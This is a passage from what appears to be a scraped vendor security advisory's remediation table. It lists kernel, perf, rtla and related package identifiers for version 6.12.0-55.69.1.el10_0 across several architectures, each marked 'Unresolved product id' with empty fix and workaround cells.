Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
